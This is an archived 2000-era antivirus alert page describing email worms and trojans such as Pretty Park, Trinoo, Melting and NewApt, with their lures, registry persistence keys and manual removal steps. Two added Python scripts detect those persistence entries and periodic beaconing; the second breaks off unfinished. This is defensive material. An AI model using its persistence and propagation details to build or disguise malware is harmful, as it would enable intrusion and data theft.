
Virus Alerts & Solutions
Last updated 10/17/2000


This page will post some of the latest viruses. No viruses will be posted for use.
Keep your system protected against viruses, security flaws and software bugs with these alerts
and solutions. Patches are available for some viruses.


Latest Virus Alerts:

Irok Spreads Via Outlook And IRC
Melting Screensaver
Pretty Park Trojan Horse
Trinoo Becomes A PC Trojan Horse
New Spin On Old Trojan Horse
Myna Macro Virus
Haiku Worm
Plage2000
NewApt Worm
Verlor Virus
LoveSong Virus
"Hi 2000" Worm Reported
Funny Worm
Babylonia Virus
Mypics.Worm Strikes
MiniZip Virus
Prilissa Virus
FunLove Virus Warning
Bubbleboy Worm Alert!
Badass Virus Infects Outlook


  Irok Virus Spreads Via Outlook And IRC
By Edric Ta, Symantec
March 24, 2000
Detected as: Irok.Trojan.Worm
Infection Length: 10001 bytes
Area of Infection: .COM and .EXE Files
Likelihood: Rare
Characteristics: Worm, Prepend



Description
Irok.Trojan.Worm is a malicious worm that spreads itself using Microsoft Outlook email and Internet Relay Chat (IRC). The worm is sent as an email attachment. The message contains the following text:

Subject: I thought you might like to see this

and the body of the email message

I thought you might like this.
I got it from paramount pictures website.
It's a startrek screen saver.

When Irok.exe is run, a black screen appears that makes it look to the user as if they are navigating through space. In the background, the worm copies itself to the C:\Windows\System directory and inserts the Irokrun.Vbs file in C:\Windows\StartMenu\Startup. It will prepend itself to executable files, and the virus has been known to corrupt its host. The Irokrun.VBS script will use Microsoft Outlook to send the same email to the first 60 entries in the user's address book.

Trigger Event
The Irok.exe attachment is launched and the VBS file is executed on reboot of machine.

Symptoms
When a user clicks on the attachment, a screen appears as if one is navigating through space. Pressing the ESC key or SPACEBAR quits the application. By then the worm has copied itself into the C:\Windows\System directory and has also dropped a file called Irokrun.vbs in C:\Windows\StartMenu\Startup. A file named WinRDE.DLL is placed in C:\Windows\System. From this point on, all executable files are infected and will fail to run properly. When the user reboots, the Irokrun.vbs file will be executed on machines with Windows Scripting Host (WSH) installed. WSH is installed by default in Windows 98 and is also found on Windows 95 and Windows NT systems with Internet Explorer 5 installed. The Irokrun.VBS script will use Microsoft Outlook to send the same email to the first 60 entries in the user's address book, attaching the Irok.exe file from the C:\Windows\System directory.

Repair
The infectious files Irok.exe, Irokrun.vbs, and WinRDE.DLL should be deleted. Infected users should also delete all files detected as Irok.Trojan.Worm.







  Melting Screensaver
Also known as Melting.Worm, W32.Melting, I-Worm.Melting.
March 17, 2000

It's one part mean and one part nasty. This new virus can hit you with a lethal one-two combination. Keep your guard up with the latest info.

Another attack has been launched. A new virus has been identified "in the wild/in the field" that could pose a threat to all Microsoft Windows systems. The consequences of falling victim to this infection could be astronomical and the payload can cause tremendous collateral damage. A combination virus/worm, Melting.Worm (a.k.a. Win32.Melting and I-Worm.Melting) has the potential to not only temporarily shut down systems, it can make the current platform permanently unusable.

Identifying The Culprit
The worm has several unique features that enable you to identify it and avoid infection. The sender will most likely be a user who was previously infected and had you listed in their address book. Therefore, the source could inadvertently be a friend or family member. In the subject line, "Fantastic Screensaver" would appear. The body of the e-mail would read as follows:

"Hello my friend!
Attached is my newest and funniest Screensaver, I named it MeltingScreen. Test it and tell me what you think.
Have a nice day my friend.
p.s.: Please install the Runtime Library for VB 5.0, before you run the ScreenSaver"


The attached file is called MeltingScreen.exe and is represented by a hexagonal snowflake. This is the actual virulent component of the e-mail and requires Visual Basic 5 runtime libraries to function.

Is It A Virus Or A Worm?

The virus constituent of the worm is exceedingly debilitating to a computer system. When the virus component of Melting.Worm is activated, it copies itself into a Windows directory as MeltingScreen.exe and remains resident in memory. The path it chooses is C:\WINDOWS\MeltingScreen.exe.
In the Windows directory, all programs with a .exe file extension are changed to a .bin file and the virus assumes the identity of the original .exe files. For example, NOTEPAD.EXE would be changed to NOTEPAD.BIN and Melting.Worm would become NOTEPAD.EXE. The Windows directory is home to very integral system files. These changes can permanently disable the operating system or cause it to become unstable.

After the virus has copied itself to C:\WINDOWS\MeltingScreen.exe, it searches the registry for the key HKEY_CURRENT_USER\MeltingScreen\String. If the key does not exist, Melting.Worm creates it and sets the default value to "MeltingScreen". The worm constituent functions very much like the Melissa virus that has received much press.
When executed, Melting.Worm looks through your Microsoft Outlook address book and attempts to send a copy of itself to every address listed. When the worm is received, it is usually from a known source. This increases the amount of "trust" that a person may have when opening an attachment. These characteristics make the worm highly prolific in its distribution and execution.
The overall implications of Melting.Worm are tremendous. The ability to administer such profound impairment and to distribute itself over the Internet makes Melting.Worm extremely dangerous. For the home user, the loss of data that could be experienced would be very frustrating and a great inconvenience. The Office/Business user would have greater issues to handle. The loss of data could potentially cripple a business, depending on how mission critical the information is.
If Melting.Worm infects you, please contact the maker of your anti-virus software for handling instructions and report the infection.
The best protection is to make sure you have the most current virus signature files available for your anti-virus software. New viruses are introduced daily, and keeping signature files up to date is the most effective way to protect yourself. Please follow best practices by not opening e-mail from unknown or unfamiliar sources, and ALWAYS scan e-mail attachments irrespective of the source.




  Pretty Park Trojan Horse
March 6, 2000
It's back. The W32/Pretty.worm.unp (a.k.a. W32.PrettyPark) is back as a variant containing an unpacked version of the executable. Masquerading as an image of Kyle from the Comedy Central series South Park, W32/Pretty.worm.unp is a fairly standard e-mail worm that forwards itself to everyone in your e-mail address book. While the virus is not destructive, it can cause surges in e-mail volume, which in turn can cause bandwidth problems if many computers on the same network are infected.


Pretty Park arrives as a message from someone who has your e-mail address in his or her address book; the attached file shows up with a picture of Kyle from South Park as its icon. Because this virus arrives as an attachment from someone you know, you might be tempted to let down your guard and open the attached program. Don't. In general, unless you're expecting a file, don't ever open an e-mail attachment, especially an executable file. And, to be safe, you should scan every e-mail attachment you receive, regardless of the source.



What It Does

There are clues that the Pretty Park message contains a virus. For starters, the subject line reads "C:\CoolProgs\Pretty Park.exe"; the file may also show up as PRETTY~1.EXE. It's interesting to note that one rarely receives messages with a file name and path as the header. The next clue to the virulence of the message comes from the message itself, "Test: Pretty Park.exe :)", which is followed by the name of the sender. Again, this isn't a typical message someone you know would be likely to send you.
Should you be unfortunate enough to execute the PRETTY PARK.EXE file, you may see the Windows screen saver pipes, or you may see nothing. Meanwhile the virus hooks into your system so that it will execute at startup, and begins sending itself to everyone in your address book. While it's emailing, it will also try to log into IRC. Once connected to IRC, the author of the virus could scan your system to find your dial up networking usernames and passwords, and other, less sensitive information.



What You Can Do

Cleaning up isn't too much trouble. If you have a commercial anti-virus package, the latest update should have a fix for this virus. You can download the latest anti-virus software updates from ZDNet Updates.com and free demos of the leading anti-virus programs from the Software Library. If not, you'll have to break out a few Windows tools and make a go of a self-cleaning job.
Your first task is to fire up the Windows registry editor (REGEDIT.EXE for Windows 9x or REGEDT32.EXE for NT). You can execute these programs from the Run command on the Start button, or by typing the program name at an MS-DOS prompt. The main part of the infection will be found in the registry keys that are used for automatic program loading. While installing, the virus will have copied itself to FILES32.VXD; this is the name to look for while editing your registry. Be careful as you work: any programs that are legitimately loaded at Windows startup will be listed under these keys, and you don't want to delete those. Infected registry keys will read
files32.vxd "%1" %*
If FILES32.VXD is the only program you find listed, you'll want to replace it with the string, including the quotation marks,
"%1" %*
The keys you need to check to see if they contain FILES32.VXD are:
HKEY_CLASSES_ROOT\exefile\shell\open\command\
HKEY_LOCAL_MACHINE\exefile\CLASSES\exefile\shell\open\command\
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
You also need to delete the registry key set up by the virus; delete the whole entry:
HKEY_CLASSES_ROOT\.dl
Finally, take a look at your WIN.INI. Check under the [windows] heading, and see if FILES32.VXD is listed on the "run=" line. Also check over your SYSTEM.INI file to see if FILES32.VXD has added itself under the [boot] section to the "shell=" line. The only thing that belongs on the "shell=" line is EXPLORER.EXE.
Once you've scrubbed your registry and system files, reboot. Now use Windows Explorer, or the Start button's Find Files command, to search for two files. First search all local writable drives for FILES32.VXD. Delete every instance. Now search for "PRETTY*.*". Delete every PRETTY PARK.EXE or PRETTY~1.EXE. Now, go to Outlook or Outlook Express and make doubly certain the virus e-mail is deleted from every folder. Empty the Deleted Items folder. Close Outlook or Outlook Express. Empty the Recycle Bin. Reboot again for safekeeping, and you're done.
By the way, if you do get infected, resist temptation and don't send an apology e-mail to everyone in your inbox—they've heard from you enough for one day.



  Trinoo Becomes A PC Trojan Horse
February 25, 2000
Last week, antivirus vendors announced the discovery of the latest upgrade to Trinoo, one of a class of tools linked to recent distributed denial of service (DDoS) attacks on ZDNet, Yahoo, CNN, and other major Web sites.

Unlike prior versions, which have only been detected on Unix-based machines, the new Trinoo daemon runs on Windows PCs, giving DDoS attackers potential access to millions of additional computers. Even worse, the daemon has been rewritten as a trojan horse. Previously, Trinoo users have been forced to gain root access to a computer before manually installing the daemon; now, a would-be DDoS attacker can randomly distribute the trojan, counting on some portion of its recipients to inadvertently activate it.
Although it is often accompanied by separate "backdoor" programs like Back Orifice, Trinoo itself actually presents almost no direct threat to those infected. That doesn't mean that it's not a major issue, however; Trinoo's real targets are large Internet servers and routers. By giving would-be attackers easy access to such large numbers of machines, Trinoo significantly raises the potential for damage from future DDoS attacks.
What It Does

The Trinoo package consists of two separate components: the server or "master", which runs on the attacker's computer, and multiple daemons or "slaves." Prior to launching a DDoS attempt, the attacker covertly installs daemons on as many "innocent" computers as possible. He or she can then initiate the DDoS using the server application by sending a command to some or all of the daemons designating the intended target. The daemons, in turn, send a "flood" of UDP traffic at the target.
The new Trinoo daemon may be installed on a Windows PC in two different ways. An attacker who can break into the PC using Back Orifice or other cracking tools can install the software manually. Alternatively, the attacker can hide the Trinoo trojan horse in email attachments or web page downloads. In either case, once activated, the daemon launches a process called "Services," which listens for commands from the Trinoo server on port 34555. It also copies a file named "SERVICE.EXE" into the C:\WINDOWS\SYSTEM directory and adds a registry entry, ensuring the process launches on reboot.

The best defense against any trojan is common sense and caution. Always be suspicious of e-mail attachments and software downloaded from the web. Never open any file received from an unknown or untrusted source.
Always keep anti-virus software installed, active, and updated. Schedule regular, frequent scans of your drives. As of this writing, anti-virus products from Trend Micro, Network Associates, and Symantec will detect the Trinoo trojan; others should have updates available soon.
If necessary, the daemon can be detected and removed manually. Pressing CTRL-ALT-DEL once will call up the task dialog box; infected machines will have a process called "Services" in this dialog. Existence of a file at "C:\WINDOWS\SYSTEM\SERVICE.EXE" is also an indication of infection. To disinfect your PC:
Take your computer offline, physically disconnecting your modem or ethernet port if necessary.
From the Start/Run menu, launch REGEDIT.EXE, and select HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run.
Locate and delete the SERVICE.EXE file. (Do NOT delete SERVICES.EXE, which is a legitimate file on Windows NT and 2000).
Press CTRL-ALT-DEL once, select "Services" from the task list, and end that task.
Remember, while Trinoo may not do any damage to your machine, it does threaten the Internet community at large. Be a good neighbor—keep your system Trinoo-free.





  New Spin On Old Trojan Horse
February 23, 2000
A new AOL-specific Trojan Horse worm has been identified; it operates as an Internet worm, stealing user passwords and forwarding "buddy-list" addresses to the virus' author. Identified near the first of the year, APSTrojan.qa has been designated as medium risk to end-users and low-risk to business users because most business users do not use AOL to access the Internet.



What It Does

This worm comes as an AOL e-mail with the subject line "hey you," and a message which reads:
hey i finally got my pics scanned..theres like 5 or 6 of them..so just download it and unzip it..and for you people who dont know how to then scroll down..tell me what you think of my pics ok? if you dont know how to unzip then follow these steps When you sign off, AOL will automatically unzip the file, unless you have turned this feature off in your download preferences. If you want to do it manually then On the My Files menu on the AOL toolbar, click Download Manager. In the Download Manager window, click Show Files Downloaded. Select my file and click Decompress
The e-mail comes with an attachment, MINE.ZIP. Activating this worm requires that you first open the e-mail, and then either use AOL's automatic unzip feature or another utility to extract the zip file. MINE.ZIP unzips into two files: MINE.EXE and README.TXT. README.TXT is not significant, but can be used to identify the presence of the virus, as it contains the message, "Did you like it? Write Back ok?=Þ"
The dirty work is done by MINE.EXE, a Visual Basic 5 (VB5) application which hooks into over 20 Windows DLL files. This is a complicated virus that uses a legacy configuration file which is often overlooked in Windows 98 and 95, WIN.INI. By making WIN.INI read-only, to the point that neither ATTRIB.EXE nor the file Properties dialog box in Windows Explorer can turn off the read-only attribute, the worm is able to assure that it will always be loaded by a RUN= line in WIN.INI; it also assures that no program with legitimate business in the WIN.INI file will be able to make any changes. Additionally, the worm creates three identical hidden files in the root, WINDOWS, and WINDOWS\SYSTEM directories: msdos98.exe, uninstallms.exe, and both mine.exe and ReadMe.Txt.
Not only is the WIN.INI file modified with the command "RUN=uninstallms.exe," but the Windows Registry is also modified to ensure that even if WIN.INI is deleted the virus will still activate. Specifically, this key is added to the Windows Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Windows="c:\msdos98.exe". Note that as this is a VB5 program, it does require MSVBVM50.DLL to run; this DLL is included with Windows 98 but not 95 by default. Don't assume that the presence of the VB5 DLL is a sign of the virus, however, as many programs are written in VB5.


What You Can Do

Getting this worm off of your system is a challenging prospect without an anti-virus program. Your best bet is to update your virus software to the latest release.
If, on the other hand, you're feeling adventurous, you can fix your own system. First, you must get the system to boot into "safe mode." To get into safe mode, use the Run command on the Start menu to execute MSCONFIG.EXE. Now head over to the General tab, select the Advanced button, and select the "Enable Startup Menu" option. Reboot. Choose safe mode from the menu that appears as your computer boots.
Once safely into safe mode, you have to find all signs of the Trojan and eradicate them. Start by using the Start button's Run command to execute REGEDIT.EXE. Once the registry file is loaded, search for the key msdos98.exe. Delete the entire entry as specified above. Close the registry editor, take another trip to the Run command and type in SYSEDIT.EXE. Find the WIN.INI file, and then look for the [Windows] section. Under that should be the line "RUN=uninstallms.exe". If you don't see this line, be sure to scroll the window all the way to the right, as there are reports that the Trojan tries to hide the run command by moving it to the far right side of the window. Last, fire up Windows Explorer and search for the files mentioned above.
To be ultra-safe, make sure you include a search for MINE.*, which will give you all forms of the virus. Finding the other files will be a snap, but depending on how many programs you've loaded, the search for README.TXT may be a bit frustrating. The best way to find both of the text files associated with the virus is to use the search dialog to scan for the text strings "Did you like it? Write Back ok?" and some of the text from the virus' e-mail message. Last, delete the mail message from AOL. When all of this is done, you can shut down and reboot your system. If you don't want the hassle of seeing the menu, go back to MSCONFIG.EXE, select the Advanced button on the General tab, and unclick the "Show Startup Menu" option.
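A check for the WIN.INI, SYSTEM.INI and registry persistence entries that the Pretty Park and APSTrojan.qa cleanup instructions above tell you to inspect by hand, written here as an added Python example (not code from the original page or from ZDNet). It works on exported text (a REGEDIT4 .reg export plus copies of the two INI files) so it can be run from a clean machine; the sample inputs are constructed, and the file names, keys and the `"%1" %*` default are the ones given in those two writeups.

```python
import re

# Persistence indicators taken from the Pretty Park and APSTrojan.qa alerts on this page.
INDICATORS = {
    "files32.vxd": "Pretty Park (W32/Pretty.worm.unp)",
    "uninstallms.exe": "APSTrojan.qa",
    "msdos98.exe": "APSTrojan.qa",
}
CLEAN_EXEFILE_COMMAND = '"%1" %*'  # clean exefile association: nothing in front of the program
EXEFILE_KEYS = (r"hkey_classes_root\exefile\shell\open\command",
                r"hkey_local_machine\software\classes\exefile\shell\open\command")
RUN_KEYS = (r"hkey_local_machine\software\microsoft\windows\currentversion\run",
            r"hkey_local_machine\software\microsoft\windows\currentversion\runservices")

def parse_ini(text):
    """Return {section: {key: value}}, lower-cased and stripped. Stripping matters: the
    APSTrojan alert reports the RUN= line padded so it scrolls off the right of SYSEDIT."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections

def parse_reg_export(text):
    """Parse a REGEDIT4-style export into {key_path_lower: {value_name: data}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.upper().startswith("REGEDIT"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, data = line.split("=", 1)
            data = data.strip()
            if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                # .reg string data escapes backslashes and quotes with a backslash
                data = re.sub(r'\\(["\\])', r"\1", data[1:-1])
            keys[current][name.strip().strip('"')] = data
    return keys

def _basename(command):
    # First token of a command line, reduced to its bare lower-case file name.
    parts = command.strip('"').split()
    return parts[0].split("\\")[-1].lower() if parts else ""

def check_ini(win_ini, system_ini):
    """Flag known loaders on the WIN.INI run= line and any non-Explorer shell= line."""
    findings = []
    run_line = parse_ini(win_ini).get("windows", {}).get("run", "")
    for token in run_line.split():
        name = _basename(token)
        if name in INDICATORS:
            findings.append(f"WIN.INI [windows] run= loads {name} ({INDICATORS[name]})")
    shell = parse_ini(system_ini).get("boot", {}).get("shell", "")
    if shell and shell.lower() != "explorer.exe":
        findings.append(f"SYSTEM.INI [boot] shell= is {shell!r}, expected EXPLORER.EXE")
    return findings

def check_registry(reg_text):
    """Flag a hijacked exefile association, known loaders under Run keys, and the .dl key."""
    findings = []
    keys = parse_reg_export(reg_text)
    for path in EXEFILE_KEYS:
        command = keys.get(path, {}).get("@")
        if command is not None and command != CLEAN_EXEFILE_COMMAND:
            findings.append(f"{path}: open command is {command!r}, expected {CLEAN_EXEFILE_COMMAND!r}")
    for path in RUN_KEYS:
        for name, data in keys.get(path, {}).items():
            if _basename(data) in INDICATORS:
                findings.append(f"{path}\\{name} = {data!r} ({INDICATORS[_basename(data)]})")
    if r"hkey_classes_root\.dl" in keys:
        findings.append("HKEY_CLASSES_ROOT\\.dl exists (created by Pretty Park)")
    return findings

def report(win_ini, system_ini, reg_text):
    """All findings for one machine's exported WIN.INI, SYSTEM.INI and registry text."""
    return check_ini(win_ini, system_ini) + check_registry(reg_text)

# Constructed samples showing both infections at once (not real captures).
SAMPLE_WIN_INI = "[windows]\nload=\n" + " " * 120 + "run=uninstallms.exe\n"
SAMPLE_SYSTEM_INI = "[boot]\nshell=Explorer.exe\n"
SAMPLE_REG = r'''REGEDIT4
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="files32.vxd \"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"Windows"="c:\\msdos98.exe"
[HKEY_CLASSES_ROOT\.dl]
@=""
'''
```

It flags only the entries named in those two alerts plus any shell= line other than EXPLORER.EXE; treat a hit as a prompt to follow the manual steps above rather than as proof of infection on its own.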




  Myna Macro Virus
February 14, 2000
The latest Word macro virus, Myna, is relatively lightweight in the world of viruses. Myna infects Word documents (similar to Melissa), but carries no malicious payload. However, the only truly safe method of dealing with these unwelcome and often dangerous bits of code is eradication. W97M/Myna is also known as W97M.Myna, and has at least five variants ranging from W97M/MynaA through W97M/MynaE.
The worrisome issue with Myna is the range of hosts it can infect. At present, Myna will infect Microsoft Word 97—including Word 97 with service release one (SR1) and above—and Word 2000. The infection site is the NORMAL.DOT template, and the virus infects when an infected document is loaded. After infection, Myna will infect on closing, opening, and creating new documents.



What It Does

The virus turns off Word's macro warning feature, so the only time you'll see a macro warning is the first time you load an infected file. With no payload, Myna doesn't really consist of much. Essentially a variant of W97/Class, the viral code is located in the same VBA class stream module used by W97/Class, named "ThisDocument." Viral infection is indicated by a string in an infected document that reads "answer=MYNAMEISVIRUS". This string serves as a simple marker for the start of the viral macro code.
The basic precautions for Word macro viruses apply here. Make certain that you use the TOOLS menu, MACRO item to set security to high. Even if you've set the security level, a prudent check of your settings now and then is advised. This virus—and presumably other macro viruses—disables the macro security check feature in Word.




What You Can Do

As of this writing, most commercial virus software vendors have released updates that include a check for Myna, so update your software to the most recent virus definition file. You do have a virus checker that you actually run on your PC at least once a day, don't you? Unless your computer exists in absolute isolation, not running virus software is simply begging for trouble. You can download the latest anti-virus software demos for free from the ZDNet Software Library or update your existing anti-virus software from ZDNet Updates.com.
Detecting Infection
As always, Myna can be removed without anti-virus software. It contains an identifiable string in a document file, so you can use Windows Explorer, My Computer, or the Start Button search facility for the text string—in this case, "answer=MYNAMEISVIRUS." You can then delete the file(s)—of course, you'll need to get the information out of those files first before you delete them.
Obviously, just copying an infected file will copy the virus. If you find yourself with an open, infected Word file, here's what you can do.
Select the text—and only the text—in your document. Note: You will lose all your text formatting when you do this.
Paste the text into Notepad, and save your file as text. Avoid using the WordPad format because it has a file format similar to Word, and there's a chance the virus could be copied.
Make a clean copy of NORMAL.DOT.
   Exit Word.
   Open Windows Explorer
   Select Program Files|Microsoft Office|Templates.
   Rename or delete NORMAL.DOT
   Open MS Word and open a new document.
   MS Word will create a new NORMAL.DOT
   Exit MS Word—the new NORMAL.DOT will be saved.
Open MS Word, then your saved .txt files, reapply formatting in Word, and re-save them as Word documents.
Not the easiest route, but if you're stuck without a virus cleaner it'll achieve the same results. As always, you can find the latest techniques and tools for preventing viruses and security violations in the ZDNet Help & How-To PC Protection Guide.




  Haiku Worm
February 10, 2000
Since the dawn of e-mail worms, it seems like a new one crops up almost daily. Mostly non-malicious, these worms are far more a headache for network administrators who must deal with the bandwidth they eat up than a real problem for users. Now there's even a worm with some entertainment value.
W95/Haiku.Worm, a.k.a. I-Worm.Haiku, Win32/Haiku.worm, and W95.Haiku.16384.Worm, is a not so typical e-mail worm with a twist: it creates haikus, plays a sound file, and delivers an interesting lecture on how to create a haiku. Another twist that is worrisome is that this virus is Internet-aware: it contains all the code needed to send e-mail messages without an e-mail program, as well as to download files from the Web.



What It Does

Several features make Haiku stand out among the pack of e-mail related viruses. Instead of hooking into Microsoft Outlook, Haiku scans files on your hard disk for e-mail addresses. It then uses the host TCP/IP stack to hook into an anonymous e-mail gateway. Once connected, it delivers its torrent of mail.
In Haiku's case the mail consists of a subject line that reads, "Fw: Compose your own haikus", a Haiku, and then the tutorial on the art of the haiku. The attached program that activates the worm is named haiku.exe. The forward is a disarming tactic, making an unsuspecting user think it's a message sent by a friend, or a typical piece of junk e-mail.
Like some e-mail worms to date, Haiku requires that the user execute the attached program either by double-clicking it in the mail message, launching it with a mouse click, or running it from the hard disk. Simply opening and reading the message will not activate Haiku.
Should you execute haiku.exe, the first thing you'll see is a dialog box (see Figure A) with a haiku and an OK button. Haiku's next task is to hook itself into the Windows registry and place a renamed copy of itself as haikug.exe in the Windows directory. The program also modifies the WIN.INI file by placing a RUN= command to execute haikug.exe on startup.

Figure A

It's at this point that the program scours your hard disk, rooting through .DOC, .EML, .HTM, .RTF, and .TXT files for e-mail addresses. This actually limits the damage that Haiku can do, since it does not appear to search through any address-book formats for common e-mail programs. Addresses in hand, Haiku fires up its own mail engine and connects to the aforementioned anonymous mail server. Once connected, the mail engine uses SMTP to send itself as a MIME-encoded attachment to all the addresses it has found on your hard drive. During this stage, you may see a message box that reads: "[I-Worm.Haiku, by Mister Sandman] The smallest box may hold The biggest treasure?" As a last gesture, Haiku connects to Xoom.COM and pulls down a .WAV file that plays a short snippet of Japanese Muzak.

What You Can Do

It is true that worms are bad news and violate both legal and ethical conventions. On the other hand, in this day of gigabyte-sized programs, you really have to admire a 16KB program that includes a rules-based haiku generator, a dictionary of words, a how-to on haiku writing, a mail engine, and a disk-search engine. Still, self-propagating spam-generating programs are a serious problem. It's exactly this approach, taken to the nth degree, that constitutes a denial of service attack. Make this worm a bit more infectious and vicious, and you could easily manage to tie up a company's data connection with thousands of junk e-mail messages.
Cleanup is a snap. You can either search for and delete every instance of HAIKU.EXE or HAIKUG.EXE, and then search your registry and WIN.INI file for references to the aforementioned program, or you can download a patch. Because this virus is so new, all you'll find at this time is warning messages on major virus vendor Web sites. An update should be available within a week, or you can use our instructions to delete the offending files.




  Plage2000
January 14, 2000
Computer Associates International on Thursday warned of a new computer worm on the horizon, the "Plage2000", which could threaten computer e-mail systems as well as e-business infrastructures.
The worm has been reported to be "in the wild" by customers of Computer Associates, the company said.
A worm is a computer program that replicates itself and spreads from computer to computer, infecting an entire system, whereas a computer virus spreads from file to file. A worm can spread without human intervention.
The Plage2000 arrives as a reply to an e-mail previously sent by the user. The original e-mail will be quoted completely in the reply. The arriving e-mail says:
P2000 Mail auto-reply:
' I'll try to reply as soon as possible.
Take a look to the attachment and send me your opinion! '
Get your FREE P2000 Mail now!
The worm is attached to the message under one of the following names: pics.exe, images.exe, joke.exe, PsPGame.exe, newsdoc.exe, hamster.exe, tamagotxi.exe, searchURL.exe, SETUP.EXE, Card.EXE, billgt.exe, midsong.exe, s3msong.exe, docs.exe, humor.exe, or fun.exe.
Self-extracting file
On execution, the worm will present itself as a self-extracting WinZip file. Extracting it will cause one of the following two messages to be displayed:
WinZip self-Extractor
ZIP damaged: file worm name: Bad CRC number.
Possible cause: file transfer error
Or,
WinZip self-Extractor - worm name:worm name - Application Error The exception unknown software exception (0xc00000fd) occurred in the application ....
In the background the worm copies itself to the Windows directory under the name INETD.EXE and adds itself to the registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run = WindowsDir\INETD.EXE.
Every five minutes the worm tries to establish a connection to a running Outlook or Exchange client. When new e-mails are received it will reply to the unread e-mails with an e-mail like the one above. The original messages remain unread.
Although the worm does not have a destructive payload, its e-mail propagation mechanism poses a threat to any Exchange e-mail infrastructure, since it can overload and take down mail servers.




  NewApt Worm
December 14, 1999

Detected as: W32.NewApt.Worm
Aliases: Worm.NewApt
Known Variants: W32.NewApt.B.Worm, W32.NewApt.C.Worm, W32.NewApt.C2.Worm, W32.NewApt.D.Worm
Infection Length: 69,632 bytes
Likelihood: Common
Detected on: Dec 14, 1999
Region Reported: Worldwide
Characteristics: Worm, Y2K




Description
W32.NewApt.Worm was discovered on December 14, 1999 in Italy.
W32.NewApt.Worm is a multi-threaded worm that propagates by email. The worm has its own SMTP (email) engine to email itself. The worm searches various files on the hard drive to find email addresses to which it sends itself.
The worm will send an email that contains one of the two following messages (depending on HTML support in the email client).

HTML compatible email clients:

http://stuart.messagemates.com/index.html
Hypercool Happy New Year 2000 funny
programs and animations…
We attached our recent animation from
this site in our mail! Check it out!

Non-HTML compatible email client:

he, your lame client cant read HTML, haha.
click attachment to see some stunningly
HOT stuff

The email attachment may have one of the following file names:

g-zilla.exe, cooler3.exe, cooler1.exe, copier.exe, video.exe, pirate.exe, goal1.exe, hog.exe, party.exe, saddam.exe, monica.exe, boss.exe, farter.exe, chestburst.exe, panther.exe, theobbq.exe, goal.exe, baby.exe, bboy.exe, cupid2.exe, fborfw.exe, casper.exe, irnglant.exe, or gadget.exe

The files listed above have no association with Message Mates products, despite what the email suggests.
When the attached file is executed it will display the following error message:
The dynamic link library giface.dll could not be found in specified path: D:\sample:;C:\WINDOWS\SYSTEM; C:\WINDOWS;C:\WINDOWS\COMMAND
The worm adds the following registry value so that it is loaded each time the computer boots:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tpawen

The worm appears to have a payload that triggers at midnight on Dec 25, 1999. When the payload activates, it will attempt to make a connection (and disconnect after a successful connection) to a specific corporate web site on port 80 (HTTP) every three seconds. The owner of this corporate web site has been notified. Please note the worm will modify the registry to enable auto-dial. This modification will allow connections to the Internet to occur automatically.
On June 12, 2000, the worm will try to remove itself from the registry when certain other conditions are met. These conditions depend on random calculations and may not always occur.
Variant Information
The W32.NewApt.B.Worm and W32.NewApt.C.Worm variants were discovered on Dec 22, 1999 and have exactly the same file size (69,632 bytes) as the original. The noticeable difference is the payload trigger date: the variants trigger at midnight on Feb 2, 2000. The payload is otherwise identical and attempts a connection to the same web site as the original every three seconds.
These variants also attempt to remove themselves one month after the original: on July 12, 2000 the worm tries to remove itself from the registry when certain other conditions are met. Those conditions depend on random calculations and may not always occur.
The W32.NewApt.D.Worm variant was discovered on Jan 10, 2000. A noticeable difference is the modified payload trigger date from the original version. The "D" variant will trigger at midnight on March 2, 2000 and the name of the file attached to the email may contain sexually explicit references.
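The payload described above, a connect-and-disconnect to one web server every three seconds, is a textbook beacon: a fixed-interval connection to a single destination, which stands out in proxy or firewall logs even when each connection looks innocent. The following is an added example, not part of the original alert and not Symantec code. It parses a constructed connection log and flags source/destination pairs whose intervals between connections are nearly constant. The log format, the internal hosts and the RFC 5737 documentation address 192.0.2.10, standing in for the undisclosed corporate web site, are all assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev


def parse_log(text):
    """Group connection times (seconds) by (source, destination) from lines of
    the form "<ISO timestamp> <src> <dst:port>" (a constructed format)."""
    epoch = datetime(1970, 1, 1)
    conns = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst = line.split()
        conns[(src, dst)].append((datetime.fromisoformat(ts) - epoch).total_seconds())
    return conns


def find_beacons(conns, min_count=10, max_jitter=0.25):
    """Return (pair, mean_interval, count) for pairs whose intervals between
    connections are nearly constant (standard deviation / mean <= max_jitter)."""
    hits = []
    for pair, times in conns.items():
        if len(times) < min_count:          # too few samples to call it periodic
            continue
        times = sorted(times)
        gaps = [b - a for a, b in zip(times, times[1:])]
        interval = mean(gaps)
        if interval > 0 and pstdev(gaps) / interval <= max_jitter:
            hits.append((pair, round(interval, 2), len(times)))
    return hits


# Constructed sample log (not a real capture). 10.1.2.3 opens a connection to
# one web server every three seconds, as the payload described above does;
# 10.1.2.4 browses the same kind of destination at irregular intervals.
# 192.0.2.0/24 is the RFC 5737 documentation range standing in for real hosts.
def _sample_log():
    lines = [f"1999-12-25T00:00:{3 * i:02d} 10.1.2.3 192.0.2.10:80" for i in range(20)]
    t = 0
    for gap in (0, 1, 7, 2, 15, 3, 40, 4, 9, 6, 22, 11):
        t += gap
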